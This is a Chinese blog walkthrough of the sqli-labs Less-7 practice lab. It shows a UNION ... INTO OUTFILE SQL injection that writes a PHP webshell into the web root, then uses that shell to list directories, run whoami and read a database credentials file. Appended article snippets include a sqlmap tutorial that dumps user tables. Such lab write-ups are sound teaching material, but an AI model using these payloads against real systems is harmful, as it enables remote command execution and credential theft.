sqli-labs靶场第七关——文件导出注入

最新推荐文章于 2025-05-16 14:42:50 发布
最新推荐文章于 2025-05-16 14:42:50 发布
阅读量645 收藏 6
点赞数 13
文章标签: sql sqli—labs 网络安全 sql注入 数据库 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2403_88102829/article/details/147981770
版权

一:目标

通过sql注入将php代码写入网站目录,通过这个php文件执行命令

二:确认前置条件

%secure_file_priv%

首先我们需要Mysql是否允许导出文件

先尝试在网页中sql注入,检查导出权限

?id=1')) union select 1,@@secure_file_priv,3-- -

检查失败

换方法,通过Mysql命令行直接执行:

win+r→powershell→mysql -u root -p→password

然后检查:

show variables like '%secure_file_priv%';

窗口显示如下 

 

这里value有三种可能的值:

  • Null:禁止所有导入导出操作(最严格)

  • 空字符串'':允许所有目录的导入导出(有安全风险)

  • 指定路径:只允许该目录下的文件操作

如果值是空or是路径,继续攻击

如果值为NULL,那么注入一定失败,需要我们修改配置 ,方法如下:

在你的Mysql文件夹里找到my.ini,从段落的中间部分找到 [mysqld],在下面一行加上

secure_file_priv = ""

保存,服务里面重启动Mysql,然后 win+r→powershell→mysql -u root -p→password,再次检查

可以看到Value值变成空,说明我们修改成功了 ~

三:确定注入类型

首先输入 ?id=1',报错

尝试单引号+括号,?id=1'),报错

 尝试?id=1'))--+,页面恢复正常!!

所以这一关要闭合 ')) 

四:写一个webshell文件

首先用order by确定有三行

payload:

http://localhost/sqli-labs/Less-7/?id=1')) union select 1,
'<?php system($_GET["cmd"]);?>',
3 
into outfile
'D:/nginx-1.27.5/html/shell.php'-- -

php代码:<?php system($_GET["cmd"]);?>

路径按照网站的真实路径来

**注意:路径使用双反斜杠\\

into outfile 文件导出:

select 内容 into outfile '文件路径';

使用条件:

1.Mysql有权限

2.知道目标路径的物理路径

3.secure_file_priv允许操作

 列出网站目录:

http://localhost/shell.php?cmd=dir D:\nginx-1.27.5\html\

 这里面可以看出我们的绝对路径是否正确

这样显示更清楚一点

http://localhost/shell.php?cmd=dir

整理我们得到的数据!

D:\nginx-1.27.5\html\  # 当前目录路径
├── 50x.html           # Nginx错误页面
├── index.html         # 默认首页
├── index.php          # PHP入口文件
├── shell.php          # 刚写入的WebShell
└── sqli-labs/         # SQLi-Labs靶场目录

再来几个查询!

查看服务器用户名

http://localhost/shell.php?cmd=whoami

 

读取数据库配置文件(获取账号密码) 

http://localhost/shell.php?cmd=type D:\nginx-1.27.5\sqli-labs\sql-connections\db-creds.inc

❀❀❀ 完结撒花!! ❀❀❀

Le_ee
关注
sqli-labs 靶场 less-7 第七详解:OUTFILE注入与配置
Superstacks超全栈
06-09 1409
SQLi-Labs是一个用于学习和练习SQL注入漏洞的开源应用程序。通过它,我们可以学习如何识别和利用不同类型的SQL注入漏洞,并了解如何修复和防范这些漏洞。经尝试竟然还需要两个括号才能显示正常。整个过程都没有错误提示或数据显示,那我们只能使用布尔注入来测试了。只有列号为3的时候,才能正常显示,则字段长度为3。进入页面中,并输入数据查看结果。输入单引号会提示语法问题。发现空数据提示语法问题。
Sqli-labs靶场(1-20
2301_77977773的博客
07-03 1062
为了不影响 80 端口的服务,我们可以设置 Apache 服务的端口为82这是因为主机本身已经存在 MySQL 服务,我们可以不使用 php-study 配置中的 MySQL,就用主机本身即可,但版本可能需要注意,我这里使用的 5.7.351.安装sqli-labs-master到phpstudy_pro中的WWW/目录下2.修改phpstudy_pro\WWW\sqli-labs-master\sql-connections的db-creds.inc文件
基于Sqli-Labs靶场SQL注入-第6~10
Joker
11-25 2441
本文讲解 updatexml() 函数报错注入导出文件字符型注入、布尔盲注、时间盲注、中国蚁剑简单使用、一句话木马注入
SQL注入sqli-labs靶场(1-37
qq_68163788的博客
02-03 1万+
sqli-labs是一个用于学习和练习SQL注入的开源项目。它提供了一系列的实验室环境,让用户能够在不同的SQL注入场景中进行练习和测试。这些场景包括基本的SQL注入、盲注、联合查询注入等等。 sqli-labs还提供了详细的说明和解释,帮助用户理解SQL注入的原理和技术。通过这些实验和学习,用户可以更好地了解SQL注入的危害,并学会如何防范和阻止SQL注入攻击
sql注入sqli-labs靶场前几讲解
m0_70483044的博客
01-09 2272
sql注入简介SQL注入是一种常见的web安全漏洞。sql注入是通过恶意的sql查询或者添加语句插入到应用的输入参数中,再在后台sql服务器解析执行进行的攻击。sql注入原因在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的"数据"拼接到SQL语句中,被当作是SQL语句的一部分执行,从而导致数据库受损。是目前黑客对数据库进行攻击的最常用手段之一。sql注入攻击对象数据库漏洞原因分析web分别前端和后端,前端负责进行展示后端负责处理来自前端的请求并提供前端展示的资源。
Sqli-labs靶场65详解(一)
m0_74848570的博客
08-07 881
1~4使用了union联合查询+字符型注入,要点在于闭合单双引号+括号要点:union联合查询UNION 操作符用于合并两个或多个 SELECT 语句的结果集UNION 内部的 SELECT语句必须拥有相同数量的列列也必须拥有相似的数据类型。同时,每条 SELECT 语句中的列的顺序必须相同order by 判断字段数。
【详细】 Sqli-labs1~65详解 解题思路+解题步骤+解析
热门推荐
Jay17的博客
08-03 4万+
【详细】 Sqli-labs1~65详解 解题思路+解题步骤+解析 详细,超级详细
sqli-labs 第七 多命通攻略
两个月亮
01-05 2146
错误输入与不正常输入的返回结果是相同的。该页面的 PHP 代码存在这么一个判断语句,在 SQL 查询结果不为空集时,返回结果为;反之返回。怎么会这样?等等,我们刚刚得出的结论好像被忽略了:该页面的 PHP 代码存在这么一个判断语句,在 SQL 查询结果不为空集时,返回结果为;反之返回。既然返回结果为空都将返回,那我们刚刚构造的判断语句又怎么能够判断出注入类型呢?在遇到读写权限问题后,尝试向搜索引擎寻求帮助,但解决方案大多针对 Linux 操作系统且并不详细,只好自己摸索了。
基于Sqli-Labs靶场SQL注入-1~4
Joker
11-11 1816
这里对SQL进行了初步的讲解,主要讲解了联合注入以及一些简单的注入类型判断,后续我会更新其他系列的注入方式,例如报错注入、二分法猜解注入、时间延迟注入导出文件字符型注入、POST类型注入注入类型。
SQLi-Labs靶场笔记(1~21
trdtyvu的博客
07-06 2812
SQLi-Labs是一个专注于SQL注入的在线靶场,通过模拟真实的Web应用环境,帮助安全爱好者提高SQL注入的防范和应对能力。它一共有65个卡,其中卡的类型有但不限于联合查询注入,报错注入,布尔盲注,延时盲注,POST注入,Cookie注入,WAF绕过……可以看出,涵盖的范围还是很广的,对于我们初学注入的人来说很友好。首页可以选择卡。
Sqli-labs-master靶场之1-21秘籍
m0_66241651的博客
07-03 904
靶场就是让我们掌握sql注入的基本方法,通秘籍来了,轻轻松松搞定!
sqlmap过SQLi-LABS靶场 1-10
小明师傅博客
06-04 8617
今天我们来用sqlmap去做SQLi-LABS靶场 首先来讲一下基础命令 1.清除sqlmap缓存: 第一个办法:在C:\Users\dragoneyes.sqlmap\output,删除output里面的内容 第二个办法:sqlmap.py --purge 2.sqlmap -u 注入点 检测注入点是否可用 sqlmap -u 注入点 –batch 自动输入 暴库 sqlmap -u 注入点 –dbs //暴库 Web当前使用的数据库 sqlmap -u 注入点 –current-db //爆当前使用的库
postgresql主从集群一键搭建脚本分享
huanhuanzhou blog
05-12 316
postgresql主从集群一键搭建脚本分享
SQL Server中调整查询超时j解决方案
qq_60521457的博客
05-13 443
SQL Server中调整查询超时
官方 Elasticsearch SQL NLPChina Elasticsearch SQL
最新发布
jifgnie的博客
05-16 228
官方的可以在kibana 控制台上进行查询:POST /_sql
PostgreSQL malformed array literal异常
mojinchuan的专栏
05-15 191
PostgreSQL malformed array literal异常问题分析与处理
基于Rust语言的Rocket框架和Sqlx库开发WebAPI项目记录(二)
2301_78858267的博客
05-16 397
在params文件夹下依次新建req.rs、resp.rs、result_parse.rs、mod.rs。在src目录下新建params文件夹。
在Oracle到GreatSQL迁移中排序规则改变引发的乱码问题分析及解决
GreatSQL2021的博客
05-14 916
Oracle 到 GreatSQL 迁移改排序规则引发乱码?本文深入分析根源,提供方案,助你快速解决,速来一探究竟!
涨薪技术|0到1学会性能测试第64课-SQL监控之Trace选项
m0_60889254的博客
05-14 1448
本文介绍了MSSQL数据库监控与调优技术中的SQLTrace选项使用。SQLServerProfiler跟踪数据库事件时,有多种设置选项,包括输出数据选项、File选项影响、收集时间范围选项和Duration列配置。输出数据选项有五种方式,包括不保存数据、保存到文件系统、保存到数据库表、同时保存到文件系统和数据库表,以及服务器端跟踪保存到文件系统。File选项影响涉及SQLProfiler对被监控SQLServer的开销和遗漏跟踪事件的影响。收集时间范围选项建议明确指定跟踪时间以减少系统开销。Duratio
sqli-labs靶场第一sqlmap注入
04-03
### SQLMap在SQLi-Labs第一中的应用 对于SQLi-Labs靶场的第一(Less-1),可以通过`sqlmap`工具实现自动化的SQL注入攻击。以下是具体的操作方法以及注意事项: #### 工具准备 确保已安装并配置好`sqlmap`环境。如果尚未安装,可通过以下命令完成安装: ```bash git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap cd sqlmap ``` #### 基本操作流程 针对SQLi-Labs第一的目标URL `http://localhost/sqli-labs/Less-1/?id=1`,可以执行如下命令来探测和利用漏洞。 ##### 探测可注入参数 运行以下命令以确认是否存在SQL注入漏洞,并定位到具体的注入点: ```bash python sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --risk=3 --level=5 --random-agent --batch ``` 上述命令中各选项的作用分别为: - `-u`: 指定目标URL。 - `--risk=3`: 设置风险级别为最高级,尝试更多复杂的payload[^1]。 - `--level=5`: 设定测试强度为最高等级,覆盖尽可能多的场景。 - `--random-agent`: 随机化User-Agent头信息,规避可能的安全防护机制[^2]。 - `--batch`: 自动处理所有交互式提示,默认选择推荐选项[^3]。 ##### 枚举数据库信息 一旦确认存在注入漏洞,则继续深入挖掘敏感数据。例如枚举当前使用的数据库名称: ```bash python sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --current-db --batch ``` 此命令会返回当前正在使用的数据库名字。 ##### 列出所有可用数据库 为了进一步了解服务器上的其他潜在资源,还可以列举全部数据库列表: ```bash python sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --dbs --batch ``` 通过该命令可以获得完整的数据库集合。 ##### 查找特定数据库内的表格结构 假设已经得知某个感兴趣的具体数据库名为`testDB`,那么就可以查询其内部包含哪些表单: ```bash python sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" -D testDB --tables --batch ``` 这里指定了目标数据库并通过`--tables`获取其中存储的数据表清单。 ##### 提取指定表的内容列定义 当明确了某张表之后,下一步便是研究它的字段构成情况: ```bash python sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" -D testDB -T users --columns --batch ``` 这条语句用于揭示所选表(`users`)的各项属性描述。 ##### 导出实际记录值 最后一步就是导出整张表里的真实数据条目了: ```bash python sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" -D testDB -T users --dump --batch ``` 至此完成了从发现漏洞直至提取有用情报的一系列动作。 ### 注意事项 尽管`sqlmap`功能强大,但在实战环境中需谨慎行事,避免触犯法律红线。仅限于授权范围内的渗透测试活动才允许使用此类技术手段。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值